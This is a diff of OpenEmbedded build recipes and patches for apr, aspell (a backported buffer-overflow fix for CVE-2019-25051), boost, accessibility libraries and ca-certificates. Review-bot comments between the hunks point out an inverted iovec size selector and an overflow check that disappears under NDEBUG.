- AC_CHECK_SIZEOF(off_t)
-
-The same for the following hardcoded types for cross compiling:
-
- pid_t 8
- ssize_t 8
- size_t 8
- off_t 8
-
-Change the above correspondingly.
-
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
-
-Upstream-Status: Pending
-
----
- configure.in | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/configure.in b/configure.in
-index 27b8539..fb408d1 100644
---- a/configure.in
-+++ b/configure.in
-@@ -1801,7 +1801,7 @@ else
- socklen_t_value="int"
- fi
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], pid_t, 8)
-+AC_CHECK_SIZEOF(pid_t)
-
- if test "$ac_cv_sizeof_pid_t" = "$ac_cv_sizeof_short"; then
- pid_t_fmt='#define APR_PID_T_FMT "hd"'
-@@ -1873,7 +1873,7 @@ APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned long, lu, [size_t_fmt="lu"], [
- APR_CHECK_TYPES_FMT_COMPATIBLE(size_t, unsigned int, u, [size_t_fmt="u"])
- ])
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], ssize_t, 8)
-+AC_CHECK_SIZEOF(ssize_t)
-
- dnl the else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_ssize_t])
-@@ -1891,7 +1891,7 @@ fi
-
- ssize_t_fmt="#define APR_SSIZE_T_FMT \"$ssize_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <stddef.h>], size_t, 8)
-+AC_CHECK_SIZEOF(size_t)
-
- # else cases below should no longer occur;
- AC_MSG_CHECKING([which format to use for apr_size_t])
-@@ -1909,7 +1909,7 @@ fi
-
- size_t_fmt="#define APR_SIZE_T_FMT \"$size_t_fmt\""
-
--APR_CHECK_SIZEOF_EXTENDED([#include <sys/types.h>], off_t, 8)
-+AC_CHECK_SIZEOF(off_t)
-
- if test "${ac_cv_sizeof_off_t}${apr_cv_use_lfs64}" = "4yes"; then
- # Enable LFS
diff --git a/meta/recipes-support/apr/apr/libtoolize_check.patch b/meta/recipes-support/apr/apr/libtoolize_check.patch
index 740792e6b0..80ce43caa4 100644
--- a/meta/recipes-support/apr/apr/libtoolize_check.patch
+++ b/meta/recipes-support/apr/apr/libtoolize_check.patch
@@ -1,6 +1,7 @@
+From 17835709bc55657b7af1f7c99b3f572b819cf97e Mon Sep 17 00:00:00 2001
From: Helmut Grohne <helmut@subdivi.de>
-Subject: check for libtoolize rather than libtool
-Last-Update: 2014-09-19
+Date: Tue, 7 Feb 2023 07:04:00 +0000
+Subject: [PATCH] check for libtoolize rather than libtool
libtool is now in package libtool-bin, but apr only needs libtoolize.
@@ -8,14 +9,22 @@ Upstream-Status: Pending [ from debian: https://sources.debian.org/data/main/a/a
Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
---- apr.orig/build/buildcheck.sh
-+++ apr/build/buildcheck.sh
-@@ -39,11 +39,11 @@ fi
+---
+ build/buildcheck.sh | 10 ++++------
+ 1 file changed, 4 insertions(+), 6 deletions(-)
+
+diff --git a/build/buildcheck.sh b/build/buildcheck.sh
+index 44921b5..08bc8a8 100755
+--- a/build/buildcheck.sh
++++ b/build/buildcheck.sh
+@@ -39,13 +39,11 @@ fi
# ltmain.sh (GNU libtool 1.1361 2004/01/02 23:10:52) 1.5a
# output is multiline from 1.5 onwards
-# Require libtool 1.4 or newer
--libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-if test -z "$libtool"; then
+- libtool=`build/PrintPath glibtool1 glibtool libtool libtool15 libtool14`
+-fi
-lt_pversion=`$libtool --version 2>/dev/null|sed -e 's/([^)]*)//g;s/^[^0-9]*//;s/[- ].*//g;q'`
+# Require libtoolize 1.4 or newer
+libtoolize=`build/PrintPath glibtoolize1 glibtoolize libtoolize libtoolize15 libtoolize14`
diff --git a/meta/recipes-support/apr/apr_1.7.0.bb b/meta/recipes-support/apr/apr_1.7.2.bb
index 7073af8c98..807dce21da 100644
--- a/meta/recipes-support/apr/apr_1.7.0.bb
+++ b/meta/recipes-support/apr/apr_1.7.2.bb
@@ -1,4 +1,8 @@
SUMMARY = "Apache Portable Runtime (APR) library"
+
+DESCRIPTION = "Create and maintain software libraries that provide a predictable \
+and consistent interface to underlying platform-specific implementations."
+
HOMEPAGE = "http://apr.apache.org/"
SECTION = "libs"
DEPENDS = "util-linux"
@@ -12,17 +16,15 @@ BBCLASSEXTEND = "native nativesdk"
SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \
file://run-ptest \
file://0002-apr-Remove-workdir-path-references-from-installed-ap.patch \
- file://0003-Makefile.in-configure.in-support-cross-compiling.patch \
file://0004-Fix-packet-discards-HTTP-redirect.patch \
file://0005-configure.in-fix-LTFLAGS-to-make-it-work-with-ccache.patch \
- file://0006-apr-fix-off_t-size-doesn-t-match-in-glibc-when-cross.patch \
file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \
file://libtoolize_check.patch \
file://0001-Add-option-to-disable-timed-dependant-tests.patch \
+ file://0001-configure-Remove-runtime-test-for-mmap-that-can-map-.patch \
"
-SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7"
-SRC_URI[sha256sum] = "e2e148f0b2e99b8e5c6caa09f6d4fb4dd3e83f744aa72a952f94f5a14436f7ea"
+SRC_URI[sha256sum] = "75e77cc86776c030c0a5c408dfbd0bf2a0b75eed5351e52d5439fa1e5509a43e"
inherit autotools-brokensep lib_package binconfig multilib_header ptest multilib_script
@@ -30,17 +32,30 @@ OE_BINCONFIG_EXTRA_MANGLE = " -e 's:location=source:location=installed:'"
# Added to fix some issues with cmake. Refer to https://github.com/bmwcarit/meta-ros/issues/68#issuecomment-19896928
CACHED_CONFIGUREVARS += "apr_cv_mutex_recursive=yes"
-
+# Enable largefile
+CACHED_CONFIGUREVARS += "apr_cv_use_lfs64=yes"
+# Additional AC_TRY_RUN tests which will need to be cached for cross compile
+CACHED_CONFIGUREVARS += "apr_cv_epoll=yes epoll_create1=yes apr_cv_sock_cloexec=yes \
+ ac_cv_struct_rlimit=yes \
+ ac_cv_func_sem_open=yes \
+ apr_cv_process_shared_works=yes \
+ apr_cv_mutex_robust_shared=yes \
+ "
# Also suppress trying to use sctp.
#
CACHED_CONFIGUREVARS += "ac_cv_header_netinet_sctp_h=no ac_cv_header_netinet_sctp_uio_h=no"
-CACHED_CONFIGUREVARS += "ac_cv_sizeof_struct_iovec=yes"
+# ac_cv_sizeof_struct_iovec is deduced using runtime check which will fail during cross-compile
+CACHED_CONFIGUREVARS += "${@['ac_cv_sizeof_struct_iovec=16','ac_cv_sizeof_struct_iovec=8'][d.getVar('SITEINFO_BITS') != '32']}"
+
CACHED_CONFIGUREVARS += "ac_cv_file__dev_zero=yes"
+CACHED_CONFIGUREVARS:append:libc-musl = " ac_cv_strerror_r_rc_int=yes"
PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
+PACKAGECONFIG:append:libc-musl = " xsi-strerror"
PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
PACKAGECONFIG[timed-tests] = "--enable-timed-tests,--disable-timed-tests,"
+PACKAGECONFIG[xsi-strerror] = "ac_cv_strerror_r_rc_int=yes,ac_cv_strerror_r_rc_int=no,"
do_configure_prepend() {
# Avoid absolute paths for grep since it causes failures
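Review bot: The `ac_cv_sizeof_struct_iovec` selector looks inverted: `[...=16, ...=8][d.getVar('SITEINFO_BITS') != '32']` picks index 1 (`=8`) whenever the target is not 32-bit, yet a `struct iovec` holding one pointer and one `size_t` is 16 bytes on 64-bit targets and 8 bytes on 32-bit ones. Changing the test to `d.getVar('SITEINFO_BITS') == '32'` makes the cached value match the ABI; if configure only tests the value for non-zero the current form is harmless today, but a wrong cached size is a trap for any later use. The hunk also introduces `CACHED_CONFIGUREVARS:append:libc-musl` and `PACKAGECONFIG:append:libc-musl` while the same file still uses `do_configure_prepend()`, so it is worth confirming that the colon override syntax is honoured by the bitbake this branch builds with. The body of `do_configure_prepend()` continues outside the hunk.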
diff --git a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
index 21bbcab3d3..d1db562bb5 100644
--- a/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
+++ b/meta/recipes-support/argp-standalone/argp-standalone_1.3.bb
@@ -2,6 +2,7 @@
# Released under the MIT license (see COPYING.MIT for the terms)
SUMMARY = "Glibc hierarchical argument parsing standalone library"
+DESCRIPTION = "Standalone version of arguments parsing functions from GLIBC"
HOMEPAGE = "http://www.lysator.liu.se/~nisse/misc/"
LICENSE = "LGPL-2.1"
LIC_FILES_CHKSUM = "file://argp.h;beginline=1;endline=20;md5=008b7e53dea6f9e1d9fdef0d9cf3184a"
diff --git a/meta/recipes-support/aspell/aspell_0.60.8.bb b/meta/recipes-support/aspell/aspell_0.60.8.bb
index 629987810a..9147c820e7 100644
--- a/meta/recipes-support/aspell/aspell_0.60.8.bb
+++ b/meta/recipes-support/aspell/aspell_0.60.8.bb
@@ -1,10 +1,21 @@
SUMMARY = "GNU Aspell spell-checker"
+
+DESCRIPTION = "Spell checker designed to eventually replace Ispell. \
+It can either be used as a library or as an independent spell checker. \
+Its main feature is that it does a superior job of suggesting possible \
+replacements for a misspelled word than just about any other spell \
+checker out there for the English language."
+
SECTION = "console/utils"
+HOMEPAGE = "http://aspell.net/"
+
LICENSE = "LGPLv2 | LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
-SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz"
+SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz \
+ file://CVE-2019-25051.patch \
+"
SRC_URI[md5sum] = "012fa9209203ae4e5a61c2a668fd10e3"
SRC_URI[sha256sum] = "f9b77e515334a751b2e60daab5db23499e26c9209f5e7b7443b05235ad0226f2"
diff --git a/meta/recipes-support/aspell/files/CVE-2019-25051.patch b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
new file mode 100644
index 0000000000..8513f6de79
--- /dev/null
+++ b/meta/recipes-support/aspell/files/CVE-2019-25051.patch
@@ -0,0 +1,101 @@
+From 0718b375425aad8e54e1150313b862e4c6fd324a Mon Sep 17 00:00:00 2001
+From: Kevin Atkinson <kevina@gnu.org>
+Date: Sat, 21 Dec 2019 20:32:47 +0000
+Subject: [PATCH] objstack: assert that the alloc size will fit within a chunk
+ to prevent a buffer overflow
+
+Bug found using OSS-Fuze.
+
+Upstream-Status: Backport
+[https://github.com/gnuaspell/aspell/commit/0718b375425aad8e54e1150313b862e4c6fd324a]
+CVE: CVE-2019-25051
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ common/objstack.hpp | 18 ++++++++++++++----
+ 1 file changed, 14 insertions(+), 4 deletions(-)
+
+diff --git a/common/objstack.hpp b/common/objstack.hpp
+index 3997bf7..bd97ccd 100644
+--- a/common/objstack.hpp
++++ b/common/objstack.hpp
+@@ -5,6 +5,7 @@
+ #include "parm_string.hpp"
+ #include <stdlib.h>
+ #include <assert.h>
++#include <stddef.h>
+
+ namespace acommon {
+
+@@ -26,6 +27,12 @@ class ObjStack
+ byte * temp_end;
+ void setup_chunk();
+ void new_chunk();
++ bool will_overflow(size_t sz) const {
++ return offsetof(Node,data) + sz > chunk_size;
++ }
++ void check_size(size_t sz) {
++ assert(!will_overflow(sz));
++ }
+
+ ObjStack(const ObjStack &);
+ void operator=(const ObjStack &);
+@@ -56,7 +63,7 @@ class ObjStack
+ void * alloc_bottom(size_t size) {
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); tmp = bottom; bottom += size;}
++ if (bottom > top) {check_size(size); new_chunk(); tmp = bottom; bottom += size;}
+ return tmp;
+ }
+ // This alloc_bottom will insure that the object is aligned based on the
+@@ -66,7 +73,7 @@ class ObjStack
+ align_bottom(align);
+ byte * tmp = bottom;
+ bottom += size;
+- if (bottom > top) {new_chunk(); goto loop;}
++ if (bottom > top) {check_size(size); new_chunk(); goto loop;}
+ return tmp;
+ }
+ char * dup_bottom(ParmString str) {
+@@ -79,7 +86,7 @@ class ObjStack
+ // always be aligned as such.
+ void * alloc_top(size_t size) {
+ top -= size;
+- if (top < bottom) {new_chunk(); top -= size;}
++ if (top < bottom) {check_size(size); new_chunk(); top -= size;}
+ return top;
+ }
+ // This alloc_top will insure that the object is aligned based on
+@@ -88,7 +95,7 @@ class ObjStack
+ {loop:
+ top -= size;
+ align_top(align);
+- if (top < bottom) {new_chunk(); goto loop;}
++ if (top < bottom) {check_size(size); new_chunk(); goto loop;}
+ return top;
+ }
+ char * dup_top(ParmString str) {
+@@ -117,6 +124,7 @@ class ObjStack
+ void * alloc_temp(size_t size) {
+ temp_end = bottom + size;
+ if (temp_end > top) {
++ check_size(size);
+ new_chunk();
+ temp_end = bottom + size;
+ }
+@@ -131,6 +139,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;
+@@ -150,6 +159,7 @@ class ObjStack
+ } else {
+ size_t s = temp_end - bottom;
+ byte * p = bottom;
++ check_size(size);
+ new_chunk();
+ memcpy(bottom, p, s);
+ temp_end = bottom + size;
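Review bot: `check_size()` enforces the bound with `assert(!will_overflow(sz))`, which compiles to nothing when `NDEBUG` is defined, so a build with `-DNDEBUG` would keep the overflow this backport is meant to close (CVE-2019-25051). The recipe should make sure aspell is never built with `NDEBUG`, or the check should fail hard unconditionally, e.g. `if (will_overflow(sz)) abort();` (`<stdlib.h>` is already included). `will_overflow()` also computes `offsetof(Node,data) + sz`, which can wrap for a very large `sz`; comparing `sz > chunk_size - offsetof(Node,data)` avoids that, assuming `chunk_size` is never smaller than the header offset. The `ObjStack` class starts and ends outside the quoted hunks.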
diff --git a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
index c297912588..ad30617e56 100644
--- a/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
+++ b/meta/recipes-support/atk/at-spi2-atk_2.34.1.bb
@@ -1,5 +1,7 @@
SUMMARY = "AT-SPI 2 Toolkit Bridge"
+DESCRIPTION = "Contains a library that bridges ATK to At-Spi2 D-Bus service. Toolkit widgets use it to provide their content to screen readers such as Orca."
HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
LICENSE = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
diff --git a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
index 84e05e77fc..2ad09878b7 100644
--- a/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
+++ b/meta/recipes-support/atk/at-spi2-core_2.34.0.bb
@@ -1,5 +1,9 @@
SUMMARY = "Assistive Technology Service Provider Interface (dbus core)"
+
+DESCRIPTION = "It provides a Service Provider Interface for the Assistive Technologies available on the GNOME platform and a library against which applications can be linked."
+
HOMEPAGE = "https://wiki.linuxfoundation.org/accessibility/d-bus"
+BUGTRACKER = "http://bugzilla.gnome.org/"
LICENSE = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
diff --git a/meta/recipes-support/atk/atk_2.34.1.bb b/meta/recipes-support/atk/atk_2.34.1.bb
index 741350ffe5..25ef3c6c52 100644
--- a/meta/recipes-support/atk/atk_2.34.1.bb
+++ b/meta/recipes-support/atk/atk_2.34.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Accessibility toolkit for GNOME"
+DESCRIPTION = "Provides application programming interfaces (APIs) for implementing accessibility support in software."
HOMEPAGE = "https://wiki.gnome.org/Accessibility"
BUGTRACKER = "https://gitlab.gnome.org/GNOME/atk/-/issues"
SECTION = "x11/libs"
diff --git a/meta/recipes-support/attr/acl_2.2.53.bb b/meta/recipes-support/attr/acl_2.2.53.bb
index 5bb50f77f7..7cee45948d 100644
--- a/meta/recipes-support/attr/acl_2.2.53.bb
+++ b/meta/recipes-support/attr/acl_2.2.53.bb
@@ -1,5 +1,10 @@
SUMMARY = "Utilities for managing POSIX Access Control Lists"
+DESCRIPTION = "ACL allows you to provide different levels of access to files \
+and folders for different users."
+
HOMEPAGE = "http://savannah.nongnu.org/projects/acl/"
+BUGTRACKER = "http://savannah.nongnu.org/bugs/?group=acl"
+
SECTION = "libs"
LICENSE = "LGPLv2.1+ & GPLv2+"
diff --git a/meta/recipes-support/attr/attr.inc b/meta/recipes-support/attr/attr.inc
index f13a83a7b4..30ba0b4445 100644
--- a/meta/recipes-support/attr/attr.inc
+++ b/meta/recipes-support/attr/attr.inc
@@ -1,4 +1,6 @@
SUMMARY = "Utilities for manipulating filesystem extended attributes"
+DESCRIPTION = "Implement the ability for a user to attach name:value pairs to objects within the XFS filesystem."
+
HOMEPAGE = "http://savannah.nongnu.org/projects/attr/"
SECTION = "libs"
diff --git a/meta/recipes-support/bash-completion/bash-completion_2.10.bb b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
index 93e7d9dc3c..1f99bf7386 100644
--- a/meta/recipes-support/bash-completion/bash-completion_2.10.bb
+++ b/meta/recipes-support/bash-completion/bash-completion_2.10.bb
@@ -1,4 +1,9 @@
SUMMARY = "Programmable Completion for Bash 4"
+DESCRIPTION = "Collection of command line command completions for the Bash shell, \
+collection of helper functions to assist in creating new completions, \
+and set of facilities for loading completions automatically on demand, as well \
+as installing them."
+
HOMEPAGE = "https://github.com/scop/bash-completion"
BUGTRACKER = "https://github.com/scop/bash-completion/issues"
diff --git a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
index 7c4db85b32..6a93cacc18 100644
--- a/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
+++ b/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb
@@ -9,7 +9,7 @@ SECTION = "console/utils"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/intel/${BPN}"
+SRC_URI = "git://github.com/intel/${BPN};branch=main;protocol=https"
SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d"
S = "${WORKDIR}/git"
@@ -22,4 +22,4 @@ RDEPENDS_${PN} = "python3-core python3-compression python3-mmap python3-setuptoo
inherit python3native
inherit setuptools3
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/boost/boost-1.72.0.inc b/meta/recipes-support/boost/boost-1.72.0.inc
index 55a095bf1c..d152895f09 100644
--- a/meta/recipes-support/boost/boost-1.72.0.inc
+++ b/meta/recipes-support/boost/boost-1.72.0.inc
@@ -11,7 +11,7 @@ BOOST_VER = "${@"_".join(d.getVar("PV").split("."))}"
BOOST_MAJ = "${@"_".join(d.getVar("PV").split(".")[0:2])}"
BOOST_P = "boost_${BOOST_VER}"
-SRC_URI = "https://dl.bintray.com/boostorg/release/${PV}/source/${BOOST_P}.tar.bz2"
+SRC_URI = "https://boostorg.jfrog.io/artifactory/main/release/${PV}/source/${BOOST_P}.tar.bz2"
SRC_URI[md5sum] = "cb40943d2a2cb8ce08d42bc48b0f84f0"
SRC_URI[sha256sum] = "59c9b274bc451cf91a9ba1dd2c7fdcaf5d60b1b3aa83f2c9fa143417cc660722"
diff --git a/meta/recipes-support/boost/boost.inc b/meta/recipes-support/boost/boost.inc
index 8eb9494381..1c13fb3599 100644
--- a/meta/recipes-support/boost/boost.inc
+++ b/meta/recipes-support/boost/boost.inc
@@ -1,4 +1,8 @@
SUMMARY = "Free peer-reviewed portable C++ source libraries"
+DESCRIPTION = "Provides free peer-reviewed portable C++ source libraries. The emphasis is on libraries which work well with the C++ \
+Standard Library. One goal is to establish 'existing practice' and \
+provide reference implementations so that the Boost libraries are suitable for eventual standardization. Some of the libraries have already been proposed for inclusion in the C++ Standards Committee's \
+upcoming C++ Standard Library Technical Report."
SECTION = "libs"
DEPENDS = "bjam-native zlib bzip2"
@@ -161,7 +165,7 @@ do_configure() {
# D2194:Fixing the failure of "error: duplicate initialization of gcc with the following parameters" during compilation.
rm -f ${WORKDIR}/user-config.jam
- echo 'using gcc : 4.3.1 : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
+ echo 'using gcc : : ${CXX} : <cflags>"${CFLAGS}" <cxxflags>"${CXXFLAGS}" <linkflags>"${LDFLAGS}" ;' >> ${WORKDIR}/user-config.jam
# If we want Python then we need to tell Boost *exactly* where to find it
if ${@bb.utils.contains('BOOST_LIBS', 'python', 'true', 'false', d)}; then
diff --git a/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
new file mode 100644
index 0000000000..46c706931b
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch
@@ -0,0 +1,32 @@
+From f9d0e594d43afcb4ab0043117249feb266ba4515 Mon Sep 17 00:00:00 2001
+From: Romain Geissler <romain.geissler@amadeus.com>
+Date: Tue, 10 Aug 2021 14:22:28 +0000
+Subject: [PATCH] Fix -Wsign-compare warning with glibc 2.34 on Linux
+ platforms.
+
+In file included from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread_only.hpp:17,
+ from /data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/thread.hpp:12,
+ from src/GetTest.cpp:12:
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp: In member function 'void boost::thread_attributes::set_stack_size(std::size_t)':
+/data/mwrep/res/osp/Boost/21-0-0-0/include/boost/thread/pthread/thread_data.hpp:61:19: error: comparison of integer expressions of different signedness: 'std::size_t' {aka 'long unsigned int'} and 'long int' [-Werror=sign-compare]
+ 61 | if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ | ^
+
+Upstream-Status: Backport [1.78.0 https://github.com/boostorg/thread/commit/f9d0e594d43afcb4ab0043117249feb266ba4515]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index bc9b1367..c43b276d 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -58,7 +58,7 @@ namespace boost
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+ #ifdef PTHREAD_STACK_MIN
+- if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
++ if (size<static_cast<std::size_t>(PTHREAD_STACK_MIN)) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;
+ int res = pthread_attr_setstacksize(&val_, size);
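Review bot: This backport carries `Upstream-Status` but no `Signed-off-by` line, unlike the apr and aspell patches added in the same change; the same holds for `0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch`. Adding `Signed-off-by: <importer name> <importer email>` to each records who vouches for the imported code. Both patches rewrite the same `PTHREAD_STACK_MIN` line in `thread_data.hpp`, so the Revert patch has to stay ahead of this one in `SRC_URI`, as `boost_1.72.0.bb` lists them now; a one-line comment there, such as `# order matters: the Revert patch must apply before the -Wsign-compare fix`, would keep a later reorder from breaking the apply.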
diff --git a/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
new file mode 100644
index 0000000000..3784cf9165
--- /dev/null
+++ b/meta/recipes-support/boost/boost/0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch
@@ -0,0 +1,24 @@
+From 74fb0a26099bc51d717f5f154b37231ce7df3e98 Mon Sep 17 00:00:00 2001
+From: Rob Boehne <robb@datalogics.com>
+Date: Wed, 20 Nov 2019 11:25:20 -0600
+Subject: [PATCH] Revert change to elide a warning that caused Solaris builds
+ to fail.
+
+Upstream-Status: Backport [1.73.0 https://github.com/boostorg/thread/commit/74fb0a26099bc51d717f5f154b37231ce7df3e98]
+---
+ boost/thread/pthread/thread_data.hpp | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/boost/thread/pthread/thread_data.hpp b/boost/thread/pthread/thread_data.hpp
+index aefbeb43..bc9b1367 100644
+--- a/boost/thread/pthread/thread_data.hpp
++++ b/boost/thread/pthread/thread_data.hpp
+@@ -57,7 +57,7 @@ namespace boost
+ #else
+ std::size_t page_size = ::sysconf( _SC_PAGESIZE);
+ #endif
+-#if PTHREAD_STACK_MIN > 0
++#ifdef PTHREAD_STACK_MIN
+ if (size<PTHREAD_STACK_MIN) size=PTHREAD_STACK_MIN;
+ #endif
+ size = ((size+page_size-1)/page_size)*page_size;
diff --git a/meta/recipes-support/boost/boost/arm-intrinsics.patch b/meta/recipes-support/boost/boost/arm-intrinsics.patch
deleted file mode 100644
index fe85c69a82..0000000000
--- a/meta/recipes-support/boost/boost/arm-intrinsics.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-Upstream-Status: Backport
-
-8/17/2010 - rebased to 1.44 by Qing He <qing.he@intel.com>
-
-diff --git a/boost/smart_ptr/detail/atomic_count_sync.hpp b/boost/smart_ptr/detail/atomic_count_sync.hpp
-index b6359b5..78b1cc2 100644
---- a/boost/smart_ptr/detail/atomic_count_sync.hpp
-+++ b/boost/smart_ptr/detail/atomic_count_sync.hpp
-@@ -33,17 +33,46 @@ public:
-
- long operator++()
- {
-+#ifdef __ARM_ARCH_7A__
-+ int v1, tmp;
-+ asm volatile ("1: \n\t"
-+ "ldrex %0, %1 \n\t"
-+ "add %0 ,%0, #1 \n\t"
-+ "strex %2, %0, %1 \n\t"
-+ "cmp %2, #0 \n\t"
-+ "bne 1b \n\t"
-+ : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+ );
-+#else
- return __sync_add_and_fetch( &value_, 1 );
-+#endif
- }
-
- long operator--()
- {
-+#ifdef __ARM_ARCH_7A__
-+ int v1, tmp;
-+ asm volatile ("1: \n\t"
-+ "ldrex %0, %1 \n\t"
-+ "sub %0 ,%0, #1 \n\t"
-+ "strex %2, %0, %1 \n\t"
-+ "cmp %2, #0 \n\t"
-+ "bne 1b \n\t"
-+ : "=&r" (v1), "+Q"(value_), "=&r"(tmp)
-+ );
-+ return value_;
-+#else
- return __sync_add_and_fetch( &value_, -1 );
-+#endif
- }
-
- operator long() const
- {
-+#if __ARM_ARCH_7A__
-+ return value_;
-+#else
- return __sync_fetch_and_add( &value_, 0 );
-+#endif
- }
-
- private:
diff --git a/meta/recipes-support/boost/boost_1.72.0.bb b/meta/recipes-support/boost/boost_1.72.0.bb
index 51c84bc935..b3ec11933c 100644
--- a/meta/recipes-support/boost/boost_1.72.0.bb
+++ b/meta/recipes-support/boost/boost_1.72.0.bb
@@ -1,7 +1,7 @@
require boost-${PV}.inc
require boost.inc
-SRC_URI += "file://arm-intrinsics.patch \
+SRC_URI += " \
file://boost-CVE-2012-2677.patch \
file://boost-math-disable-pch-for-gcc.patch \
file://0001-Apply-boost-1.62.0-no-forced-flags.patch.patch \
@@ -9,4 +9,6 @@ SRC_URI += "file://arm-intrinsics.patch \
file://0001-dont-setup-compiler-flags-m32-m64.patch \
file://0001-revert-cease-dependence-on-range.patch \
file://0001-added-typedef-executor_type.patch \
+ file://0001-Revert-change-to-elide-a-warning-that-caused-Solaris.patch \
+ file://0001-Fix-Wsign-compare-warning-with-glibc-2.34-on-Linux-p.patch \
"
diff --git a/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
new file mode 100644
index 0000000000..5c4a32f526
--- /dev/null
+++ b/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch
@@ -0,0 +1,80 @@
+From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Mon, 18 Oct 2021 12:05:49 +0200
+Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired
+ certificates."
+
+This avoids a dependency on python3-cryptography, and only checks
+for expired certs (which is upstream concern, but not ours).
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ debian/changelog | 1 -
+ debian/control | 2 +-
+ mozilla/certdata2pem.py | 11 -----------
+ 3 files changed, 1 insertion(+), 13 deletions(-)
+
+diff --git a/debian/changelog b/debian/changelog
+index 531e4d0..4006509 100644
+--- a/debian/changelog
++++ b/debian/changelog
+@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low
+ - "Trustis FPS Root CA"
+ - "Staat der Nederlanden Root CA - G3"
+ * Blacklist expired root certificate "DST Root CA X3" (closes: #995432)
+- * mozilla/certdata2pem.py: print a warning for expired certificates.
+
